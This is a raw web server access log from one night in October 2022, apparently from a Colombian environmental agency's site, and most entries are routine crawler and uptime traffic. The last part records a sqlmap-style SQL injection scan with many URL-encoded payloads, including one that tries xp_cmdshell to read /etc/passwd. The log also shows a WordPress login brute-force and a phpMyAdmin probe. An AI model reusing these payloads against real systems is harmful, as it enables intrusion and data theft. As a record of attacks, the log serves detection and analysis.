201.245.192.253 - - [02/Oct/2022:00:56:55 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 503 1020
216.245.221.92 - - [02/Oct/2022:00:58:00 -0500] "HEAD / HTTP/1.1" 200 -
152.61.192.232 - - [02/Oct/2022:00:58:20 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?request=GetCapabilities&service=WMS HTTP/1.1" 503 1020
152.61.192.232 - - [02/Oct/2022:00:58:21 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?SERVICE=WMS&REQUEST=GetCapabilities HTTP/1.1" 503 1020
152.61.192.232 - - [02/Oct/2022:00:58:21 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?WMTVER=1.0.0&REQUEST=capabilities HTTP/1.1" 503 1020
172.22.2.4 - - [02/Oct/2022:00:57:11 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [02/Oct/2022:00:58:01 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57725
185.119.81.109 - - [02/Oct/2022:01:00:02 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.109 - - [02/Oct/2022:01:00:03 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
201.245.192.253 - - [02/Oct/2022:01:01:54 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 503 1020
136.243.79.223 - - [02/Oct/2022:01:02:05 -0500] "GET /images/feria-veh%C3%ADculos-sostenibles_optimized.jpeg HTTP/1.1" 406 -
216.245.221.92 - - [02/Oct/2022:01:03:00 -0500] "HEAD / HTTP/1.1" 200 -
199.59.150.180 - - [02/Oct/2022:01:03:00 -0500] "GET /images/feria-veh%C3%ADculos-sostenibles_optimized.jpeg HTTP/1.1" 404 1034
172.22.2.4 - - [02/Oct/2022:01:03:01 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
152.61.128.50 - - [02/Oct/2022:01:04:58 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?request=GetCapabilities&service=WMS HTTP/1.1" 503 1020
152.61.128.50 - - [02/Oct/2022:01:04:59 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?SERVICE=WMS&REQUEST=GetCapabilities HTTP/1.1" 503 1020
152.61.128.50 - - [02/Oct/2022:01:04:59 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?WMTVER=1.0.0&REQUEST=capabilities HTTP/1.1" 503 1020
172.22.2.4 - - [02/Oct/2022:01:03:51 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52877
201.245.192.253 - - [02/Oct/2022:01:06:53 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 503 1020
157.55.39.202 - - [02/Oct/2022:01:07:14 -0500] "GET /BLA/resoluciones/00000347.tif HTTP/1.1" 404 1018
207.46.13.190 - - [02/Oct/2022:01:07:54 -0500] "GET /forest/ HTTP/1.1" 200 12041
216.245.221.92 - - [02/Oct/2022:01:08:00 -0500] "HEAD / HTTP/1.1" 200 -
199.16.157.182 - - [02/Oct/2022:01:08:10 -0500] "GET /images/feria-veh%C3%ADculos-sostenibles_optimized.jpeg HTTP/1.1" 404 1034
172.22.2.4 - - [02/Oct/2022:01:08:51 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [02/Oct/2022:01:09:41 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52877
201.245.192.253 - - [02/Oct/2022:01:11:52 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 503 1020
216.245.221.92 - - [02/Oct/2022:01:13:00 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [02/Oct/2022:01:14:41 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
157.55.39.25 - - [02/Oct/2022:01:16:32 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/0753.pdf HTTP/1.1" 200 510227
207.46.13.213 - - [02/Oct/2022:01:16:41 -0500] "GET /portaldeninos/aulas-ambientales/aula-ambiental-sorotama/ HTTP/1.1" 200 89596
201.245.192.253 - - [02/Oct/2022:01:16:51 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 503 1020
207.46.13.213 - - [02/Oct/2022:01:16:51 -0500] "GET /portaldeninos/aulas-ambientales/aula-ambiental-sorotama/ HTTP/1.1" 200 89596
172.22.2.4 - - [02/Oct/2022:01:15:31 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 54003
216.245.221.92 - - [02/Oct/2022:01:18:00 -0500] "HEAD / HTTP/1.1" 200 -
185.119.81.109 - - [02/Oct/2022:01:19:38 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.109 - - [02/Oct/2022:01:19:39 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3650
201.245.192.253 - - [02/Oct/2022:01:21:45 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 503 1020
201.245.192.253 - - [02/Oct/2022:01:21:47 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 503 1020
201.245.192.253 - - [02/Oct/2022:01:21:50 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 503 1020
172.22.2.4 - - [02/Oct/2022:01:20:31 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [02/Oct/2022:01:23:00 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [02/Oct/2022:01:21:21 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52877
172.22.2.4 - - [02/Oct/2022:01:26:07 -0500] "GET /BLA/boletinlegal/Directivas/2017/Directiva%20No.%2002%20del%2017%20de%20Enero%20de%202017.pdf HTTP/1.1" 304 -
201.245.192.253 - - [02/Oct/2022:01:26:49 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 503 1020
216.245.221.92 - - [02/Oct/2022:01:28:00 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [02/Oct/2022:01:26:21 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [02/Oct/2022:01:27:11 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58163
118.195.252.158 - - [02/Oct/2022:01:28:55 -0500] "GET http://190.27.245.106:80/phpMyAdmin/scripts/setup.php HTTP/1.0" 403 1165
118.195.252.158 - - [02/Oct/2022:01:28:55 -0500] "GET http://190.27.245.106:80/pma/scripts/setup.php HTTP/1.0" 404 1018
118.195.252.158 - - [02/Oct/2022:01:28:55 -0500] "GET http://190.27.245.106:80/mysql/scripts/setup.php HTTP/1.0" 404 1018
118.195.252.158 - - [02/Oct/2022:01:28:55 -0500] "GET http://190.27.245.106:80/db/scripts/setup.php HTTP/1.0" 404 1018
201.245.192.253 - - [02/Oct/2022:01:31:45 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 503 1020
201.245.192.253 - - [02/Oct/2022:01:31:47 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 503 1020
201.245.192.253 - - [02/Oct/2022:01:31:48 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 503 1020
157.55.39.202 - - [02/Oct/2022:01:32:07 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0146.pdf HTTP/1.1" 200 458995
216.245.221.92 - - [02/Oct/2022:01:33:00 -0500] "HEAD / HTTP/1.1" 200 -
207.46.13.40 - - [02/Oct/2022:01:33:06 -0500] "GET /Publicaciones/2022EE182087.pdf HTTP/1.1" 404 228
172.22.2.4 - - [02/Oct/2022:01:32:11 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [02/Oct/2022:01:33:01 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60281
201.245.192.253 - - [02/Oct/2022:01:36:47 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 503 1020
207.46.13.40 - - [02/Oct/2022:01:37:47 -0500] "GET /appsia/controlador HTTP/1.1" 503 1020
216.245.221.92 - - [02/Oct/2022:01:38:00 -0500] "HEAD / HTTP/1.1" 200 -
207.46.13.40 - - [02/Oct/2022:01:38:28 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202005/0995.tif HTTP/1.1" 200 194202
157.55.39.25 - - [02/Oct/2022:01:38:44 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202005/00001067.tif HTTP/1.1" 200 212792
199.59.150.180 - - [02/Oct/2022:01:39:12 -0500] "GET /images/feria-veh%C3%ADculos-sostenibles_optimized.jpeg HTTP/1.1" 404 1034
194.165.17.17 - - [02/Oct/2022:01:39:14 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
207.46.13.89 - - [02/Oct/2022:01:39:20 -0500] "GET /BLA/resoluciones/AUTOS%202022/2186.pdf HTTP/1.1" 200 367463
172.22.2.4 - - [02/Oct/2022:01:38:01 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
194.165.17.17 - - [02/Oct/2022:01:39:44 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5&GqeS%3D6827%20AND%201%3D1%20UNION%20ALL%20SELECT%201%2CNULL%2C%27%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%27%2Ctable_name%20FROM%20information_schema.tables%20WHERE%202%3E1--%2F%2A%2A%2F%3B%20EXEC%20xp_cmdshell%28%27cat%20..%2F..%2F..%2Fetc%2Fpasswd%27%29%23 HTTP/1.1" 200 4895
194.165.17.17 - - [02/Oct/2022:01:39:47 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
194.165.17.17 - - [02/Oct/2022:01:39:48 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2184 HTTP/1.1" 200 4895
194.165.17.17 - - [02/Oct/2022:01:39:49 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5%28.%28%2C.%27%2C%2C%22%27 HTTP/1.1" 200 4895
194.165.17.17 - - [02/Oct/2022:01:39:49 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5%27SkedmD%3C%27%22%3ECmJnVG HTTP/1.1" 200 4895
194.165.17.17 - - [02/Oct/2022:01:39:57 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5%29%20AND%206944%3D2914%20AND%20%281634%3D1634 HTTP/1.1" 200 4895
194.165.17.17 - - [02/Oct/2022:01:39:58 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5%29%20AND%205209%3D5209%20AND%20%282499%3D2499 HTTP/1.1" 200 4895
207.46.13.84 - - [02/Oct/2022:01:39:58 -0500] "GET /BLA/resoluciones/00000320.tif HTTP/1.1" 404 1018
194.165.17.17 - - [02/Oct/2022:01:39:58 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5%20AND%201685%3D3869 HTTP/1.1" 200 4895
194.165.17.17 - - [02/Oct/2022:01:39:58 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5%20AND%205209%3D5209 HTTP/1.1" 200 4895
194.165.17.17 - - [02/Oct/2022:01:39:59 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5%27%29%20AND%207320%3D3686%20AND%20%28%27PVyD%27%3D%27PVyD HTTP/1.1" 200 4895
194.165.17.17 - - [02/Oct/2022:01:40:00 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5%27%29%20AND%205209%3D5209%20AND%20%28%27RQcT%27%3D%27RQcT HTTP/1.1" 200 4895
194.165.17.17 - - [02/Oct/2022:01:40:00 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5%27%20AND%207580%3D6885%20AND%20%27joPg%27%3D%27joPg HTTP/1.1" 200 4895
194.165.17.17 - - [02/Oct/2022:01:40:01 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5%27%20AND%205209%3D5209%20AND%20%27EtlF%27%3D%27EtlF HTTP/1.1" 200 4895
194.165.17.17 - - [02/Oct/2022:01:40:01 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5%25%27%20AND%202688%3D1431%20AND%20%27%25%27%3D%27 HTTP/1.1" 200 4895
194.165.17.17 - - [02/Oct/2022:01:40:02 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5%25%27%20AND%205209%3D5209%20AND%20%27%25%27%3D%27 HTTP/1.1" 200 4895
194.165.17.17 - - [02/Oct/2022:01:40:03 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5%20AND%201248%3D9723--%20fYfr HTTP/1.1" 200 4895
194.165.17.17 - - [02/Oct/2022:01:40:03 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5%20AND%205209%3D5209--%20UJmi HTTP/1.1" 200 4895
194.165.17.17 - - [02/Oct/2022:01:40:04 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=%28SELECT%20%28CASE%20WHEN%20%284133%3D2519%29%20THEN%204133%20ELSE%204133%2A%28SELECT%204133%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%29%20END%29%29 HTTP/1.1" 200 4895
194.165.17.17 - - [02/Oct/2022:01:40:04 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=%28SELECT%20%28CASE%20WHEN%20%289015%3D9015%29%20THEN%209015%20ELSE%209015%2A%28SELECT%209015%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%29%20END%29%29 HTTP/1.1" 200 4895
194.165.17.17 - - [02/Oct/2022:01:40:05 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5%29%20AND%20%28SELECT%205679%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x7176627171%2C%28SELECT%20%28ELT%285679%3D5679%2C1%29%29%29%2C0x716a706b71%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%287963%3D7963 HTTP/1.1" 200 4895
194.165.17.17 - - [02/Oct/2022:01:40:06 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5%20AND%20%28SELECT%205679%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x7176627171%2C%28SELECT%20%28ELT%285679%3D5679%2C1%29%29%29%2C0x716a706b71%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29 HTTP/1.1" 200 4895
194.165.17.17 - - [02/Oct/2022:01:40:06 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5%27%29%20AND%20%28SELECT%205679%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x7176627171%2C%28SELECT%20%28ELT%285679%3D5679%2C1%29%29%29%2C0x716a706b71%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%27jlYt%27%3D%27jlYt HTTP/1.1" 200 4895
194.165.17.17 - - [02/Oct/2022:01:40:07 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5%27%20AND%20%28SELECT%205679%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x7176627171%2C%28SELECT%20%28ELT%285679%3D5679%2C1%29%29%29%2C0x716a706b71%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27LQMb%27%3D%27LQMb HTTP/1.1" 200 4895
194.165.17.17 - - [02/Oct/2022:01:40:07 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5%25%27%20AND%20%28SELECT%205679%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x7176627171%2C%28SELECT%20%28ELT%285679%3D5679%2C1%29%29%29%2C0x716a706b71%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27%25%27%3D%27 HTTP/1.1" 200 4895
194.165.17.17 - - [02/Oct/2022:01:40:08 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5%20AND%20%28SELECT%205679%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x7176627171%2C%28SELECT%20%28ELT%285679%3D5679%2C1%29%29%29%2C0x716a706b71%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29--%20XrwH HTTP/1.1" 200 4895
194.165.17.17 - - [02/Oct/2022:01:40:09 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5%29%20AND%208408%3DCAST%28%28CHR%28113%29%7C%7CCHR%28118%29%7C%7CCHR%2898%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%288408%3D8408%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%28113%29%7C%7CCHR%28106%29%7C%7CCHR%28112%29%7C%7CCHR%28107%29%7C%7CCHR%28113%29%29%20AS%20NUMERIC%29%20AND%20%289000%3D9000 HTTP/1.1" 200 4895
194.165.17.17 - - [02/Oct/2022:01:40:09 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5%20AND%208408%3DCAST%28%28CHR%28113%29%7C%7CCHR%28118%29%7C%7CCHR%2898%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%288408%3D8408%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%28113%29%7C%7CCHR%28106%29%7C%7CCHR%28112%29%7C%7CCHR%28107%29%7C%7CCHR%28113%29%29%20AS%20NUMERIC%29 HTTP/1.1" 200 4895
194.165.17.17 - - [02/Oct/2022:01:40:10 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5%27%29%20AND%208408%3DCAST%28%28CHR%28113%29%7C%7CCHR%28118%29%7C%7CCHR%2898%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%288408%3D8408%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%28113%29%7C%7CCHR%28106%29%7C%7CCHR%28112%29%7C%7CCHR%28107%29%7C%7CCHR%28113%29%29%20AS%20NUMERIC%29%20AND%20%28%27yZlv%27%3D%27yZlv HTTP/1.1" 200 4895
194.165.17.17 - - [02/Oct/2022:01:40:11 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5%27%20AND%208408%3DCAST%28%28CHR%28113%29%7C%7CCHR%28118%29%7C%7CCHR%2898%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%288408%3D8408%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%28113%29%7C%7CCHR%28106%29%7C%7CCHR%28112%29%7C%7CCHR%28107%29%7C%7CCHR%28113%29%29%20AS%20NUMERIC%29%20AND%20%27OPnA%27%3D%27OPnA HTTP/1.1" 200 4895
194.165.17.17 - - [02/Oct/2022:01:40:11 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5%25%27%20AND%208408%3DCAST%28%28CHR%28113%29%7C%7CCHR%28118%29%7C%7CCHR%2898%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%288408%3D8408%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%28113%29%7C%7CCHR%28106%29%7C%7CCHR%28112%29%7C%7CCHR%28107%29%7C%7CCHR%28113%29%29%20AS%20NUMERIC%29%20AND%20%27%25%27%3D%27 HTTP/1.1" 200 4895
194.165.17.17 - - [02/Oct/2022:01:40:12 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5%20AND%208408%3DCAST%28%28CHR%28113%29%7C%7CCHR%28118%29%7C%7CCHR%2898%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%288408%3D8408%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%28113%29%7C%7CCHR%28106%29%7C%7CCHR%28112%29%7C%7CCHR%28107%29%7C%7CCHR%28113%29%29%20AS%20NUMERIC%29--%20ReWI HTTP/1.1" 200 4895
194.165.17.17 - - [02/Oct/2022:01:40:13 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5%29%20AND%204494%3DCONVERT%28INT%2C%28SELECT%20CHAR%28113%29%2BCHAR%28118%29%2BCHAR%2898%29%2BCHAR%28113%29%2BCHAR%28113%29%2B%28SELECT%20%28CASE%20WHEN%20%284494%3D4494%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%28113%29%2BCHAR%28106%29%2BCHAR%28112%29%2BCHAR%28107%29%2BCHAR%28113%29%29%29%20AND%20%288423%3D8423 HTTP/1.1" 200 4895
194.165.17.17 - - [02/Oct/2022:01:40:14 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5%20AND%204494%3DCONVERT%28INT%2C%28SELECT%20CHAR%28113%29%2BCHAR%28118%29%2BCHAR%2898%29%2BCHAR%28113%29%2BCHAR%28113%29%2B%28SELECT%20%28CASE%20WHEN%20%284494%3D4494%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%28113%29%2BCHAR%28106%29%2BCHAR%28112%29%2BCHAR%28107%29%2BCHAR%28113%29%29%29 HTTP/1.1" 200 4895
194.165.17.17 - - [02/Oct/2022:01:40:14 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5%27%29%20AND%204494%3DCONVERT%28INT%2C%28SELECT%20CHAR%28113%29%2BCHAR%28118%29%2BCHAR%2898%29%2BCHAR%28113%29%2BCHAR%28113%29%2B%28SELECT%20%28CASE%20WHEN%20%284494%3D4494%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%28113%29%2BCHAR%28106%29%2BCHAR%28112%29%2BCHAR%28107%29%2BCHAR%28113%29%29%29%20AND%20%28%27ChtQ%27%3D%27ChtQ HTTP/1.1" 200 4895
194.165.17.17 - - [02/Oct/2022:01:40:15 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5%27%20AND%204494%3DCONVERT%28INT%2C%28SELECT%20CHAR%28113%29%2BCHAR%28118%29%2BCHAR%2898%29%2BCHAR%28113%29%2BCHAR%28113%29%2B%28SELECT%20%28CASE%20WHEN%20%284494%3D4494%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%28113%29%2BCHAR%28106%29%2BCHAR%28112%29%2BCHAR%28107%29%2BCHAR%28113%29%29%29%20AND%20%27maaB%27%3D%27maaB HTTP/1.1" 200 4895
194.165.17.17 - - [02/Oct/2022:01:40:16 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5%25%27%20AND%204494%3DCONVERT%28INT%2C%28SELECT%20CHAR%28113%29%2BCHAR%28118%29%2BCHAR%2898%29%2BCHAR%28113%29%2BCHAR%28113%29%2B%28SELECT%20%28CASE%20WHEN%20%284494%3D4494%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%28113%29%2BCHAR%28106%29%2BCHAR%28112%29%2BCHAR%28107%29%2BCHAR%28113%29%29%29%20AND%20%27%25%27%3D%27 HTTP/1.1" 200 4895
194.165.17.17 - - [02/Oct/2022:01:40:16 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5%20AND%204494%3DCONVERT%28INT%2C%28SELECT%20CHAR%28113%29%2BCHAR%28118%29%2BCHAR%2898%29%2BCHAR%28113%29%2BCHAR%28113%29%2B%28SELECT%20%28CASE%20WHEN%20%284494%3D4494%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%28113%29%2BCHAR%28106%29%2BCHAR%28112%29%2BCHAR%28107%29%2BCHAR%28113%29%29%29--%20mwuN HTTP/1.1" 200 4895
194.165.17.17 - - [02/Oct/2022:01:40:17 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5%29%20AND%203813%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28113%29%7C%7CCHR%28118%29%7C%7CCHR%2898%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283813%3D3813%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28106%29%7C%7CCHR%28112%29%7C%7CCHR%28107%29%7C%7CCHR%28113%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%282804%3D2804 HTTP/1.1" 200 4895
194.165.17.17 - - [02/Oct/2022:01:40:17 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5%20AND%203813%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28113%29%7C%7CCHR%28118%29%7C%7CCHR%2898%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283813%3D3813%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28106%29%7C%7CCHR%28112%29%7C%7CCHR%28107%29%7C%7CCHR%28113%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29 HTTP/1.1" 200 4895
194.165.17.17 - - [02/Oct/2022:01:40:18 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5%27%29%20AND%203813%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28113%29%7C%7CCHR%28118%29%7C%7CCHR%2898%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283813%3D3813%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28106%29%7C%7CCHR%28112%29%7C%7CCHR%28107%29%7C%7CCHR%28113%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%27sDnW%27%3D%27sDnW HTTP/1.1" 200 4895
194.165.17.17 - - [02/Oct/2022:01:40:18 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5%27%20AND%203813%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28113%29%7C%7CCHR%28118%29%7C%7CCHR%2898%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283813%3D3813%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28106%29%7C%7CCHR%28112%29%7C%7CCHR%28107%29%7C%7CCHR%28113%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%27lBxM%27%3D%27lBxM HTTP/1.1" 200 4895
194.165.17.17 - - [02/Oct/2022:01:40:19 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5%25%27%20AND%203813%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28113%29%7C%7CCHR%28118%29%7C%7CCHR%2898%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283813%3D3813%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28106%29%7C%7CCHR%28112%29%7C%7CCHR%28107%29%7C%7CCHR%28113%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%27%25%27%3D%27 HTTP/1.1" 200 4895
194.165.17.17 - - [02/Oct/2022:01:40:20 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5%20AND%203813%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28113%29%7C%7CCHR%28118%29%7C%7CCHR%2898%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283813%3D3813%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28106%29%7C%7CCHR%28112%29%7C%7CCHR%28107%29%7C%7CCHR%28113%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29--%20kbQS HTTP/1.1" 200 4895
194.165.17.17 - - [02/Oct/2022:01:40:21 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=%28SELECT%209897%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x7176627171%2C%28SELECT%20%28ELT%289897%3D9897%2C1%29%29%29%2C0x716a706b71%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29 HTTP/1.1" 200 4895
